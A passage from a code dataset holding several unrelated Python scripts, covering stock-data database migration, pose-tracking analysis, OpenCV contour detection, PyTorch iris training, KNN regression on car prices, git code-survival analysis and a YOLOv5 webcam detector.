\r\n","sub_path":"old_solutions/projecteuler206.py","file_name":"projecteuler206.py","file_ext":"py","file_size_in_byte":1335,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"92"} +{"seq_id":"555161879","text":"from models import db, Stock, Stock_realtime, Admin, News, \\\n DisclosureInfo, Recruitment, News_Post, Recruit_Post\nfrom dateutil.parser import parse\n\nimport csv\n\n\n# def db_create_tables(event, context):\n# db.connect()\n# db.drop_tables([Stock, Stock_realtime])\n# db.create_tables([Stock, Stock_realtime, Admin, News, DisclosureInfo, Recruitment, News_Post, Recruit_Post])\n\ndef db_migrate(event, context):\n with open('stock.csv', 'rt') as stock:\n stock = stock.readlines()[1:]\n csv_stock = csv.reader(stock)\n # 데이터만 csv로\n for row in csv_stock:\n stock_object = Stock.create(each_date=parse(row[0]).date(), price=int(row[1]), diff=int(row[2]), start_price=row[3],\n top_price=row[4], low_price=row[5], volume=row[6])\n stock_object.save()\n\ndef db_connect(event, context):\n # stocks = Stock.select()\n # for stock in stocks:\n # print(stock.each_date, stock.price)\n # return len(stocks)\n return db.get_tables()\n\nif __name__ == \"__main__\":\n db_migrate(None, None)","sub_path":"db_connect.py","file_name":"db_connect.py","file_ext":"py","file_size_in_byte":1080,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"92"} +{"seq_id":"622563693","text":"import numpy as np\r\nimport pandas as pd\r\nimport glob\r\nimport os\r\n\r\n# goes thru each csv file and finds the frames in which each joint is past the 400pixel y zone\r\npath = r\"Y:\\DLC\\ACC_DMS_imaging-acb-2020-09-01\\videos\\*.csv\"\r\nd = []\r\nfor fname in glob.glob(path):\r\n df = pd.read_csv(fname, skiprows=2)\r\n df2 = df[(df['y'] > 400) & (df['y.1'] > 400) & (df['y.2'] > 400) & (df['y.3'] > 400) & (df['y.4'] > 400)]\r\n dis = df2['y'].count()\r\n tot = df['y'].count()\r\n val = (dis/tot)*100\r\n d.append(val)\r\n print(val)\r\n\r\n# does the same for imaging videos \r\npath = r\"Y:\\DLC\\ACC_DMS_imaging-acb-2020-09-01\\videos\\*.csv\"\r\nd2 = []\r\nfor fname in glob.glob(path):\r\n df = pd.read_csv(fname, skiprows=2)\r\n df2 = df[(df['y'] > 400) & (df['y.1'] > 400) & (df['y.2'] > 400) & (df['y.3'] > 400) & (df['y.4'] > 400)]\r\n dis = df2['y'].count()\r\n tot = df['y'].count()\r\n val = (dis/tot)*100\r\n d2.append(val)\r\n print(val)\r\n\r\n# make boxplots \r\nimport seaborn as sns\r\nimport matplotlib.pyplot as plt\r\n\r\nplt.figure(figsize=(8,8))\r\n\r\nplt.subplot(2,2,1)\r\nax = sns.boxplot(x=d2)\r\nax.set_title('imaging')\r\n\r\nplt.subplot(2,2,2)\r\nax = sns.boxplot(x=d)\r\nax.set_title('Opto')\r\n\r\n# save numpy arrays of disenaged percentages \r\nfrom numpy import save\r\nsave('imaging.npy', d2)\r\nsave('opto.npy', d)\r\n\r\n# find and save file names \r\npath = r\"Y:\\DLC\\ACC-DMS_nphr-acb-2020-07-30\\videos\\pre-track\\*.csv\"\r\nframes = []\r\nfor fname in glob.glob(path):\r\n frames.append(fname)\r\n print(fname)\r\nsave('opto_names.npy', frames)\r\n\r\n# dataframe of both file names + percent disengaged \r\ndf = pd.DataFrame(np.load('imaging_names.npy'), columns = ['names'])\r\ndf['disengaged'] = np.load('imaging.npy')\r\ndf2 = df[df['disengaged'] > 15] #new data frame with outlier percentage points \r\ndf2\r\n# df2['names'].str.slice(45, 72) #file names are annoyingly long so use this to get the important file name info\r\n\r\n\r\n","sub_path":"ACC-DMS DLC/Disengaged-Analysis/find_percent_disenaged_frames.py","file_name":"find_percent_disenaged_frames.py","file_ext":"py","file_size_in_byte":1895,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"92"} +{"seq_id":"634986698","text":"import cv2\nimport numpy as np\nimport time\nimport math\n\n# 검은색 이미지 개수 -\n# gray 범위는 0~255인데 이 범위를 몇개로 나눌것인지\nimage_num = 16\n\n\n# 컨투어 찾기\ndef findContour(image):\n # 글자의 외각만 찾기, 좌표들은 contours에 들어있음\n contours, hierarchy = cv2.findContours(image, cv2.RETR_TREE, cv2.CHAIN_APPROX_SIMPLE)\n\n # 컨투어 반환\n return contours, hierarchy\n\n\n# 종(0)켈레톤\ndef skeletonize(img):\n start_time = time.time()\n\n # ret, img = cv2.threshold(img, 127, 255, cv2.THRESH_BINARY_INV)\n th, img = cv2.threshold(img, 0, 255, cv2.THRESH_BINARY | cv2.THRESH_OTSU)\n skel = img.copy()\n cv2.imshow('binary_image', img)\n skel[:, :] = 0\n kernel = cv2.getStructuringElement(cv2.MORPH_CROSS, (3, 3))\n\n while True:\n eroded = cv2.morphologyEx(img, cv2.MORPH_ERODE, kernel)\n temp = cv2.morphologyEx(eroded, cv2.MORPH_DILATE, kernel)\n temp = cv2.subtract(img, temp)\n skel = cv2.bitwise_or(skel, temp)\n img[:, :] = eroded[:, :]\n if cv2.countNonZero(img) == 0:\n break\n print('종켈레톤 끝 : ', time.time() - start_time, '\\n')\n\n return skel\n\n\ndef hsvEqualized(hsv_image):\n start_time = time.time()\n\n h, s, v = cv2.split(hsv_image)\n\n # h,s,v값을 히스토그램 평활화\n equalizedH = cv2.equalizeHist(h)\n equalizedS = cv2.equalizeHist(s)\n equalizedV = cv2.equalizeHist(v)\n\n # h,s,v,를 각각 평활화 작업후 를 합쳐서 새로운 hsv 이미지를 만듦.\n new_hsv_image = cv2.merge([equalizedH, equalizedS, equalizedV])\n\n # hsv -> bgr\n new_hsv_image = cv2.cvtColor(new_hsv_image, cv2.COLOR_HSV2BGR)\n\n print('hsv 평활화 후 bgr 이미지로 변환 : ', time.time() - start_time, '\\n')\n return new_hsv_image\n\n\n# 색의 개수 만큼 검은색 이미지를 만든다.\ndef createBlackImage(image):\n start_time = time.time()\n\n print('검은색 이미지 ' + str(image_num) + '개 만들기 시작')\n\n draw_image_list = []\n\n for i in range(0, image_num):\n black_image = np.zeros_like(image)\n draw_image_list.append(black_image)\n\n print('검은색 이미지 만들기 끝 : ', time.time() - start_time, '\\n')\n\n return draw_image_list\n\n\n# 검은색 이미지위에 뽑아낸 색 그리기\ndef blackImageDraw(x_y_line_image, black_image_list):\n start_time = time.time()\n print('검은색 이미지 위에 색 그리기 시작')\n devide_range = math.ceil(255 / image_num)\n for index, image in enumerate(black_image_list):\n pts = np.where(\n (x_y_line_image >= (devide_range * (index))) & (x_y_line_image < (devide_range * (index + 1))))\n # print(devide_range * index, devide_range * (index + 1))\n black_image_list[index][pts[0], pts[1]] = 255\n cv2.imshow('basic' + str(index), black_image_list[index])\n\n # 가로로 늘리기\n kernel = np.ones((8, 3), np.uint8)\n black_image_list[index] = cv2.morphologyEx(black_image_list[index], cv2.MORPH_CLOSE, kernel, iterations=1)\n\n # 침식\n kernel = np.ones((2, 2), np.uint8)\n black_image_list[index] = cv2.erode(black_image_list[index], kernel, iterations=1)\n\n # cv2.imshow('black' + str(index), black_image_list[index])\n # cv2.waitKey(0)\n print('검은색 이미지 위에 색 그리기 끝 : ', time.time() - start_time, '\\n')\n\n return black_image_list\n\n\n# 시간체크 시작\nstart_time = time.time()\n\n# 이미지 경로\nimage_path = '../image/test_image/2.jpg'\n\n# bgr 이미지 불러오기\nbgr_image = cv2.imread(image_path)\ncv2.imshow('bgr_image', bgr_image)\n\n# bgr -> hsv로 변환\nhsv_image = cv2.cvtColor(bgr_image, cv2.COLOR_BGR2HSV)\n\n# hsb 이미지 평활화 후 bgr 이미지로 바꾸는 작업\nnew_bgr_image = hsvEqualized(hsv_image)\n\n# bgr -> gray 변환\ngray_image = cv2.cvtColor(bgr_image, cv2.COLOR_BGR2GRAY)\ncv2.imshow('gray_image', gray_image)\n\n# 가로선 추출\nx_line_image = cv2.Sobel(gray_image, cv2.CV_64F, 0, 1, ksize=1)\nx_line_image = np.absolute(x_line_image)\nx_line_image = np.uint8(x_line_image)\ncv2.imshow('x_line_image', x_line_image)\n\n# 세로선 추출\ny_line_image = cv2.Sobel(gray_image, cv2.CV_64F, 1, 0, ksize=1)\ny_line_image = np.absolute(y_line_image)\ny_line_image = np.uint8(y_line_image)\ncv2.imshow('y_line_image', y_line_image)\n\n# 가로 세로 합친 이미지 보여주기\nbgr_x_line_add_y_line_image = cv2.bitwise_or(x_line_image, y_line_image)\ncv2.imshow('bgr_x_line_add_y_line_image', bgr_x_line_add_y_line_image)\n\n\"\"\" 추가 작업 해보는 곳 \"\"\"\n\n\"\"\"\"\"\"\n\n# 검은색 이미지 만들기\nblack_image_list = createBlackImage(bgr_x_line_add_y_line_image)\n\n# 검은색 이미지위에 gray 범위 값에 해당하는 부분 흰색으로 그리는 메서드\ndraw_image_list = blackImageDraw(bgr_x_line_add_y_line_image, black_image_list)\n\n# 네모영역 그리기\ncontour_count = 0 # 컨투어 개수\nfor i in draw_image_list:\n con, hierarchy = findContour(i)\n for index, j in enumerate(con):\n x, y, w, h = cv2.boundingRect(j)\n cv2.rectangle(bgr_image, (x, y), (x + w, y + h), (0, 0, 255), 1)\n contour_count = contour_count + 1\n\n# 종영 스켈레톤 적용 - 스켈레톤화된 이미지 반환함.\nskel_image = skeletonize(bgr_x_line_add_y_line_image)\ncv2.imshow('skel_image', skel_image)\n\n# 컨투어 찾기\ncontour, hierarchy = findContour(skel_image)\n\n# 네모영역 그리기\n# for i, con in enumerate(contour):\n# x, y, w, h = cv2.boundingRect(con)\n#\n# cv2.rectangle(bgr_image, (x, y), (x + w, y + h), (0, 0, 255), 1)\n# cv2.circle(bgr_image, (int((x + x + w) / 2), int((y + y + h) / 2)), 1, (0, 0, 255), 1)\n# crop_image = new_bgr_image[y:y + h + 1, x:x + w + 1]\n# cv2.imwrite('../resultFolder/' + str(i) + '_crop.jpg', crop_image)\n\n# 최종이미지 출력\ncv2.imshow('result', bgr_image)\n\nprint('컨투어 개수 : ', contour_count)\n# 시간측정 끝\nprint(\"코드 수행시간 : \", time.time() - start_time)\ncv2.waitKey(0)\n","sub_path":"DongHwi/2020-02-14.py","file_name":"2020-02-14.py","file_ext":"py","file_size_in_byte":5993,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"92"} +{"seq_id":"639345349","text":"import dataset\nimport helper\nimport transforms\nimport model\nimport meter\nimport time\n\nimport torch\nimport torch.nn as nn\nfrom torch.utils import data\nfrom torch.utils.data.sampler import SubsetRandomSampler\n\n\n#Hyper Paramater\nLRATE = 0.01\nBSIZE = 128\nNUM_EPOCH = 100\n\n\n\npath = 'dataset/iris.data'\nfeature_cols = ['sepal_length', 'sepal_width','petal_length','petal_witdh']\ntarget_cols = ['species']\nCLAZZ = [\"Iris-setosa\", \"Iris-versicolor\", \"Iris-virginica\"]\n\niris_dataset = dataset.IrisDataset(\n path, feature_cols,\n target_cols, CLAZZ,\n transforms_feature=transforms.NumpyToFloatTensor(),\n transforms_target=transforms.NumpyToLongTensor())\n\ntrain_idx, valid_idx = helper.indice_splitter(iris_dataset, valid_size=0.2)\n\ntrain_loader = data.DataLoader(iris_dataset, batch_size=BSIZE, sampler=SubsetRandomSampler(train_idx), num_workers=0)\nvalid_loader = data.DataLoader(iris_dataset, batch_size=BSIZE, sampler=SubsetRandomSampler(valid_idx), num_workers=0)\n\nmodel = model.IrisNetwork(4,32,3)\ncriterion = nn.CrossEntropyLoss()\noptimizer = torch.optim.SGD(model.parameters(), lr=LRATE)\n\nbest_loss = 1.5\nhistory = {'epoch':[], 'train_loss':[],'valid_loss':[],}\nfor epoch in range(NUM_EPOCH):\n batch_time = meter.AverageMeter()\n data_time = meter.AverageMeter()\n losses = meter.AverageMeter()\n\n end_time = time.time()\n for idx, (x_train, y_train) in enumerate(train_loader):\n data_time.update(time.time() - end_time)\n\n out = model(x_train)\n loss = criterion(out, y_train)\n loss.backward()\n optimizer.step()\n\n losses.update(loss.item(), x_train.size(0))\n batch_time.update(time.time() - end_time)\n end_time = time.time()\n\n print(f'Train Epoch [{epoch+1}/{NUM_EPOCH}] [{idx}/{len(train_loader)}]\\t'\n f' Time {batch_time.val:.3f} ({batch_time.avg:.3f})\\t'\n f' Data {data_time.val:.3f} ({data_time.avg:.3f})\\t'\n f' Loss {losses.val:.4f} ({losses.avg:.4f}) ')\n\n history['epoch'].append(epoch)\n history['train_loss'].append(losses.avg)\n\n\n with torch.no_grad():\n end_time = time.time()\n for idx, (x_valid, y_valid) in enumerate(valid_loader):\n data_time.update(time.time() - end_time)\n\n out = model(x_valid)\n loss = criterion(out, y_valid)\n\n losses.update(loss.item(), x_valid.size(0))\n batch_time.update(time.time() - end_time)\n end_time = time.time()\n\n print(f'Valid Epoch [{epoch + 1}/{NUM_EPOCH}] [{idx}/{len(valid_loader)}]\\t'\n f' Time {batch_time.val:.3f} ({batch_time.avg:.3f})\\t'\n f' Data {data_time.val:.3f} ({data_time.avg:.3f})\\t'\n f' Loss {losses.val:.4f} ({losses.avg:.4f}) ')\n\n history['valid_loss'].append(losses.avg)\n\n is_best = losses.avg < best_loss\n best_loss = min(losses.avg, best_loss)\n helper.save_checkpoint({\n 'epoch': epoch + 1,\n 'batch_size': BSIZE,\n 'learning_rate': LRATE,\n 'total_clazz': len(CLAZZ),\n 'class_to_idx': iris_dataset.class_to_idx,\n 'labels': CLAZZ,\n 'history': history,\n 'arch': 'IrisNet',\n 'state_dict': model.state_dict(),\n 'best_loss': best_loss,\n 'optimiz1er': optimizer.state_dict(),\n }, is_best)\n\n","sub_path":"train.py","file_name":"train.py","file_ext":"py","file_size_in_byte":3307,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"92"} +{"seq_id":"536421970","text":"import numpy as np\nimport pandas as pd\nfrom scipy.io import arff\nfrom sklearn.model_selection import LeaveOneOut\nfrom scaler import MinMaxScaler\nfrom distance import Manhattan, Euclidean\nfrom KNN import KNN\n\n# knn for numeric prediction\n #approach 1: Inverse distance\nclass Weight_approach1:\n def __init__(self):\n self.name = \"inverse\"\n \n def calc_weight(self, dist):\n return 1/(dist+0.00000000001)\n\n#approach 2: Inverse distance squared\nclass Weight_approach2:\n def __init__(self):\n self.name = \"inverse squared\"\n\n def calc_weight(self, dist):\n return 1/(dist*dist+0.00000000001)\n\n\n #approach 3: Exponential \nclass Weight_approach3:\n def __init__(self):\n self.name = \"exponential\"\n def calc_weight(self, dist):\n return np.exp(-dist)\n\n#appoarch 4\nclass Weight_approach4:\n def __init__(self):\n self.name = \"Dudani\"\n def calc_weight(self, dist, x):\n if len(dist) == 1:\n return dist[0]+0.0000000000001\n else:\n return (dist[-1]-x+0.000000000001) / (dist[-1]-dist[0] + 0.0001) # +0.0001 in case all k nearest have same dist\n\nclass KNN_Numeric(KNN):\n def __init__(self, x_data=[], labels=[], k_neighbours=7):\n super(KNN_Numeric, self).__init__(x_data, labels, k_neighbours)\n \n def predict_value(self, neighbours):\n return np.mean(neighbours)\n\n def predict(self, ux, method=None, distance = 'Euclidean'):\n dist = self.default_search(ux)\n neighbours = []\n for k in range(self.k_neighbours):\n neighbours.append(dist[k][self.LABEL_INDEX])\n return self.predict_value(neighbours)\n\n\nclass WKNN_Numeric(KNN_Numeric):\n def __init__(self, x_data=[], labels=[], k_neighbours=7,weight = 1):\n if weight == 1:\n self.w = Weight_approach1()\n elif weight == 2:\n self.w = Weight_approach2()\n elif weight == 3:\n self.w = Weight_approach3()\n elif weight == 4:\n self.w = Weight_approach4()\n else:\n self.w = Weight_approach1()\n super(WKNN_Numeric, self).__init__(x_data, labels, k_neighbours)\n \n def predict_value(self, neighbours):\n # Calculate weighted sum average\n total_value = 0\n total_weight = 0\n for i in range(len(neighbours)):\n if self.w.name == \"Dudani\":\n ng = []\n for j in range(len(neighbours)):\n ng.append(neighbours[j][self.DISTANCE_INDEX])\n weight = self.w.calc_weight(ng, neighbours[i][self.DISTANCE_INDEX])\n else:\n weight = self.w.calc_weight(neighbours[i][self.DISTANCE_INDEX])\n total_weight += weight \n total_value += (weight*neighbours[i][self.LABEL_INDEX])\n return total_value/total_weight \n\n\n def predict(self, ux):\n dist = self.default_search(ux)\n neighbours = []\n for k in range(self.k_neighbours):\n neighbours.append(dist[k])\n return self.predict_value(neighbours)\n\ndef Test_KNN_Numeric(x_data, labels):\n # Scale numeric features so they are between 0-1\n scaler = MinMaxScaler()\n scaled_x_data = scaler.fit_transform(x_data)\n\n x_test = scaled_x_data[0] # first entry is test data\n y_test = labels[0]\n x_train = scaled_x_data[1:] # the rest is training\n y_train = labels[1:]\n\n knn = KNN_Numeric(x_train, y_train, 7)\n print(f'Predicted Price: {knn.predict(x_test)}')\n print(f'Actual Price: {y_test}')\n\ndef cross_validation(x_data, labels, knn, k_neighbours=7, distance = Euclidean()):\n # Scale numeric features so they are between 0-1\n scaler = MinMaxScaler()\n scaled_x_data = scaler.fit_transform(x_data)\n knn.d = distance\n # Leave One Out Cross Validation\n loo = LeaveOneOut()\n predicted_error = []\n for train_index, test_index in loo.split(scaled_x_data):\n # Split training and test data\n X_train, X_test = scaled_x_data[train_index], scaled_x_data[test_index]\n y_train, y_test = labels[train_index], labels[test_index]\n \n # Set training data to knn \n knn.x_data = X_train\n knn.labels = y_train\n knn.k_neighbours = k_neighbours\n \n # Predict value\n predicted_value = knn.predict(X_test[0])\n # Store difference between predicted value and actual value in array \n predicted_error.append(np.abs(predicted_value - y_test[0]))\n \n # Determine the std deviation of predicted error\n print(f\"Mean of predicted error of KNN: {np.mean(predicted_error)}\")\n return np.mean(predicted_error)\n\n\"\"\" Args: data, list\n Creates new column for each label (label name + '-numeric') that encodes categorical labels to integers \n\"\"\"\ndef convert_to_numeric(data, labels):\n for label in labels:\n data[label] = data[label].astype('category')\n numeric_label = label + \"-numeric\"\n data[numeric_label] = data[label].cat.codes \n return data\n\ndef main():\n # Load data from autos.aff\n data_set = arff.loadarff('autos.arff')\n data = pd.DataFrame(data_set[0]) \n\n # Make new numeric labels for each of these categorical labels \n data = convert_to_numeric(data, ['make', 'fuel-type', 'aspiration', 'num-of-doors', 'body-style', \n 'drive-wheels', 'engine-location', 'engine-type', 'num-of-cylinders', \n 'fuel-system'])\n \n # Remove the old categorical labels \n data.drop(['make', 'fuel-type', 'aspiration', 'num-of-doors', 'body-style', \n 'drive-wheels', 'engine-location', 'engine-type', 'num-of-cylinders', \n 'fuel-system', 'normalized-losses'], axis=1, inplace=True)\n\n # Remove missing values\n filtered = data.dropna()\n #print(data)\n print(filtered.shape)\n\n # Separate labels & x-data\n labels = filtered['price'].to_numpy()\n x_data = filtered.drop('price', axis=1)\n\n # TEMPORARY TEST FOR KNN NUMERIC\n # Test_KNN_Numeric(x_data, labels)\n\n # Cross Validation for KNN\n '''\n print(\"Cross Validation for normal KNN\")\n for i in range(1,10):\n cross_validation(x_data, labels, KNN_Numeric(), i)\n \n '''\n # Cross Validiation for KNN Weighted\n print(\"Cross Validation for weighted KNN\")\n for i in range(1, 10):\n cross_validation(x_data, labels, WKNN_Numeric(weight=4), i)\n \n\nif __name__ == \"__main__\":\n main()","sub_path":"KNN_Numeric.py","file_name":"KNN_Numeric.py","file_ext":"py","file_size_in_byte":6413,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"92"} +{"seq_id":"261489933","text":"# -*- coding: utf-8 -*-\n#\n# Copyright 2016 Erik Bernhardsson\n#\n# Licensed under the Apache License, Version 2.0 (the \"License\");\n# you may not use this file except in compliance with the License.\n# You may obtain a copy of the License at\n#\n# http://www.apache.org/licenses/LICENSE-2.0\n#\n# Unless required by applicable law or agreed to in writing, software\n# distributed under the License is distributed on an \"AS IS\" BASIS,\n# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.\n# See the License for the specific language governing permissions and\n# limitations under the License.\n\nfrom __future__ import print_function\nimport argparse, git, datetime, numpy, traceback, time, os, fnmatch, json, progressbar\n\nparser = argparse.ArgumentParser(description='Analyze git repo')\nparser.add_argument('--cohortfm', default='%Y', help='A Python datetime format string such as \"%%Y\" for creating cohorts (default: %(default)s)')\nparser.add_argument('--interval', default=7*24*60*60, type=int, help='Min difference between commits to analyze (default: %(default)s)')\nparser.add_argument('--ignore', default=[], action='append', help='File patterns that should be ignored (can provide multiple, will each subtract independently)')\nparser.add_argument('--only', default=[], action='append', help='File patterns that have to match (can provide multiple, will all have to match)')\nparser.add_argument('--outdir', default='.', help='Output directory to store results (default: %(default)s)')\nparser.add_argument('--branch', default='master', help='Branch to track (default: %(default)s)')\nparser.add_argument('repos', nargs=1)\nargs = parser.parse_args()\n\nrepo = git.Repo(args.repos[0])\ncommit2cohort = {}\ncode_commits = [] # only stores a subset\nmaster_commits = []\ncommit2timestamp = {}\ncohorts_set = set()\nexts_set = set()\nif not os.path.exists(args.outdir):\n os.makedirs(args.outdir)\n\nprint('Listing all commits')\nbar = progressbar.ProgressBar(max_value=progressbar.UnknownLength)\nfor i, commit in enumerate(repo.iter_commits(args.branch)):\n bar.update(i)\n cohort = datetime.datetime.utcfromtimestamp(commit.committed_date).strftime(args.cohortfm)\n commit2cohort[commit.hexsha] = cohort\n cohorts_set.add(cohort)\n if len(commit.parents) == 1:\n code_commits.append(commit)\n last_date = commit.committed_date\n commit2timestamp[commit.hexsha] = commit.committed_date\n\nprint('Backtracking the master branch')\nbar = progressbar.ProgressBar(max_value=progressbar.UnknownLength)\ni, commit = 0, repo.head.commit\nlast_date = None\nwhile True:\n bar.update(i)\n if not commit.parents:\n break\n if last_date is None or commit.committed_date < last_date - args.interval:\n master_commits.append(commit)\n last_date = commit.committed_date\n i, commit = i+1, commit.parents[0]\n\ndef get_entries(commit):\n return [entry for entry in commit.tree.traverse()\n if entry.type == 'blob'\n and all([fnmatch.fnmatch(entry.path, pattern) for pattern in args.only])\n and not any([fnmatch.fnmatch(entry.path, pattern) for pattern in args.ignore])]\n\nprint('Counting total entries to analyze')\nentries_total = 0\nbar = progressbar.ProgressBar(max_value=len(master_commits))\nfor i, commit in enumerate(reversed(master_commits)):\n bar.update(i)\n n = 0\n for entry in get_entries(commit):\n n += 1\n _, ext = os.path.splitext(entry.path)\n exts_set.add(ext)\n entries_total += n\n\ndef get_file_histogram(commit, path):\n h = {}\n try:\n for old_commit, lines in repo.blame(commit, path):\n cohort = commit2cohort[old_commit.hexsha]\n h[cohort] = h.get(cohort, 0) + len(lines)\n if old_commit.hexsha in commit2timestamp:\n h[old_commit.hexsha] = h.get(old_commit.hexsha, 0) + len(lines)\n _, ext = os.path.splitext(path)\n h[ext] = h.get(ext, 0) + len(lines)\n except KeyboardInterrupt:\n raise\n except:\n traceback.print_exc()\n return h\n\ncurves = {}\nts = []\nfile_histograms = {}\nlast_commit = None\ncommit_history = {}\nprint('Analyzing commit history')\nbar = progressbar.ProgressBar(max_value=entries_total)\nentries_processed = 0\nfor commit in reversed(master_commits):\n t = datetime.datetime.utcfromtimestamp(commit.committed_date)\n ts.append(t)\n changed_files = set()\n for diff in commit.diff(last_commit):\n if diff.a_blob:\n changed_files.add(diff.a_blob.path)\n if diff.b_blob:\n changed_files.add(diff.b_blob.path)\n last_commit = commit\n \n histogram = {}\n entries = get_entries(commit)\n for entry in entries:\n bar.update(entries_processed)\n entries_processed += 1\n if entry.path in changed_files or entry.path not in file_histograms:\n file_histograms[entry.path] = get_file_histogram(commit, entry.path)\n for key, count in file_histograms[entry.path].items():\n histogram[key] = histogram.get(key, 0) + count\n\n for key, count in histogram.items():\n if key not in cohorts_set and key not in exts_set:\n commit_history.setdefault(key, []).append((commit.committed_date, count))\n\n for cohort in cohorts_set:\n curves.setdefault(cohort, []).append(histogram.get(cohort, 0))\n\n for ext in exts_set:\n curves.setdefault(ext, []).append(histogram.get(ext, 0))\n\n# Dump cohort plot data\ncohorts = sorted(cohorts_set)\nf = open(os.path.join(args.outdir, 'cohorts.json'), 'w')\njson.dump({'y': [curves[cohort] for cohort in cohorts],\n 'ts': [t.isoformat() for t in ts],\n 'labels': ['Code added in %s' % c for c in cohorts]}, f)\nf.close()\n\n# Dump file extension plot\nexts = sorted(exts_set)\nf = open(os.path.join(args.outdir, 'exts.json'), 'w')\njson.dump({'y': [curves[ext] for ext in exts],\n 'ts': [t.isoformat() for t in ts],\n 'labels': exts}, f)\nf.close()\n\n# Dump survival data\nf = open(os.path.join(args.outdir, 'survival.json'), 'w')\njson.dump(commit_history, f)\nf.close()\n","sub_path":"analyze.py","file_name":"analyze.py","file_ext":"py","file_size_in_byte":6051,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"92"} +{"seq_id":"315823159","text":"import sys\n# sys.path.append('D:\\python\\yolov5_notebook\\yolov5-master\\yolov5-master')\nsys.path.append('E:\\picture_fiting\\yolov5-master\\yolov5-master')\n\n\n\nfrom pathlib import Path\nimport numpy as np\nimport torch\nfrom numpy import random\nfrom models.yolo import Model\nfrom utils.general import set_logging, xyxy2xywh, scale_coords\nfrom utils.google_utils import attempt_download\nfrom utils.plots import plot_one_box_fir\nimport cv2\nimport time\nimport hubconf_video as hub\nfrom PIL import Image\n# import temperature as tp\n\n\n# from .\nclass detect_yolo:\n def __init__(self):\n # self.model = hub.create(name='yolov5s', pretrained=True, channels=3, classes=80) \n # self.model = hub.custom(path_or_model=r'D:\\python\\yolov5_notebook\\yolov5-master\\yolov5-master\\runs\\train\\exp\\weights\\best.pt') \n self.model = hub.custom(path_or_model=r'E:\\picture_fiting\\yolov5-master\\yolov5-master\\yolov5s.pt') \n # self.model = hub.custom(path_or_model=r'\\python\\yolov5_notebook\\yolov5-master\\yolov5-master\\yolov5s.pt') \n self.model = self.model.autoshape() \n self.model.conf = 0.5 # confidence threshold (0-1)\n self.model.iou = 0.45 # NMS IoU threshold (0-1)\n def detect_yolo_big (self, img):\n results = self.model(img)\n \n # pos = results.xyxy[0].cpu().numpy()\n pos = results.xyxy[0].cpu().numpy().tolist()\n print(pos)\n if pos :\n #results.xyxy[0] = x1,y1,x2,y2, score, 類別 \n # .cup() 當用gpu在跑時要回傳成cpu \n # numpy() tensor ->array\n # tolist() list -> array\n area_list = []\n for i in pos:\n area = (i[2]-i[0])*(i[3]-i[1]) \n area_list.append(area)\n # for i in pos:\n # area = (i[2]-i[0])*(i[3]-i[1]) \n # if i[4]>0.7 :\n # area_list.append(area)\n # else : \n pos_big_index = area_list.index(max(area_list))\n pos_big = list(map(int,pos[pos_big_index]))\n # pos_big = pos[pos_big_index]\n #找出最大面積\n return pos_big,len(pos)\n \n else:\n s =[0,0,0,0,0]\n return None,0\n def detect_yolo (self, img):\n results = self.model(img)\n pos1 = results.xyxy[0][:,:4].round()\n pos2 = results.xyxy[0][:,4:6]\n pos = torch.cat([pos1,pos2],dim=1)\n\n # print(\"cat\",torch.cat([results.xyxy[0][:,:4],results.xyxy[0][:,4:6]],dim=1) )\n # pos = results.xyxy[0].cpu().numpy().round()\n # pos = results.xyxy[0].cpu().numpy().tolist()\n # print(pos)\n #results.xyxy[0] = x1,y1,x2,y2, score, 類別 \n # .cup() 當用gpu在跑時要回傳成cpu \n # numpy() tensor ->array\n # tolist() list -> array\n return pos\n \ndef center(xyxy):\n x1,y1,x2,y2 = xyxy\n x = (x1 + x2)/2\n y = (y1 + y2)/2\n center = x , y\n return center\n\n\nnames = ['person', 'bicycle', 'car', 'motorcycle', 'airplane', 'bus', 'train', 'truck', 'boat', 'traffic light',\n 'fire hydrant', 'stop sign', 'parking meter', 'bench', 'bird', 'cat', 'dog', 'horse', 'sheep', 'cow',\n 'elephant', 'bear', 'zebra', 'giraffe', 'backpack', 'umbrella', 'handbag', 'tie', 'suitcase', 'frisbee',\n 'skis', 'snowboard', 'sports ball', 'kite', 'baseball bat', 'baseball glove', 'skateboard', 'surfboard',\n 'tennis racket', 'bottle', 'wine glass', 'cup', 'fork', 'knife', 'spoon', 'bowl', 'banana', 'apple',\n 'sandwich', 'orange', 'broccoli', 'carrot', 'hot dog', 'pizza', 'donut', 'cake', 'chair', 'couch',\n 'potted plant', 'bed', 'dining table', 'toilet', 'tv', 'laptop', 'mouse', 'remote', 'keyboard', 'cell phone',\n 'microwave', 'oven', 'toaster', 'sink', 'refrigerator', 'book', 'clock', 'vase', 'scissors', 'teddy bear',\n 'hair drier', 'toothbrush']\ncolors = [[random.randint(0, 255) for _ in range(3)] for _ in names]\nif __name__ == '__main__':\n isstop = True\n M = np.load('./transform/524-13/M.npy')\n # M = np.load('M.npy')\n cap = cv2.VideoCapture(0)\n cap_r = cv2.VideoCapture(1)\n t1 = time.time()\n # cap.set(cv2. CAP_PROP_FRAME_WIDTH, 2560)\n # cap.set(cv2. CAP_PROP_FRAME_HEIGHT, 1980)\n cap.set(cv2. CAP_PROP_FRAME_WIDTH, 1280)\n cap.set(cv2. CAP_PROP_FRAME_HEIGHT, 720)\n\n cap_r.set(cv2.CAP_PROP_FRAME_WIDTH, 320)\n cap_r.set(cv2.CAP_PROP_FRAME_HEIGHT, 240)\n \n model = detect_yolo()\n # print(22)\n # time.sleep(1)\n # imgs = cv2.imread(r'D:\\python\\yolov5_notebook\\yolov5-master\\yolov5-master\\data\\images/bus.jpg')\n # results = model.detect_yolo(imgs)\n # # gn = torch.tensor(imgs.shape)[[1, 0, 1, 0]]\n # if len(results):\n # print('sss1',results)\n # # print('len',len(results))\n # # print('results[-1]',results[:, -1])\n # # print('results[-1]',results[:, -1].unique())\n # for c in results[:, -1].unique():\n # n = (results[:, -1] == c).sum() # detections per class\n # s += f'{n} {names[int(c)]}s, ' # add to string\n # for *xyxy, conf, cls in reversed(results): \n # line = (cls, *xyxy, conf) \n # print(\"line\",line)\n # print(\"xyxy:\",xyxy)\n # label = f'{names[int(cls)]} {conf:.2f}'\n # 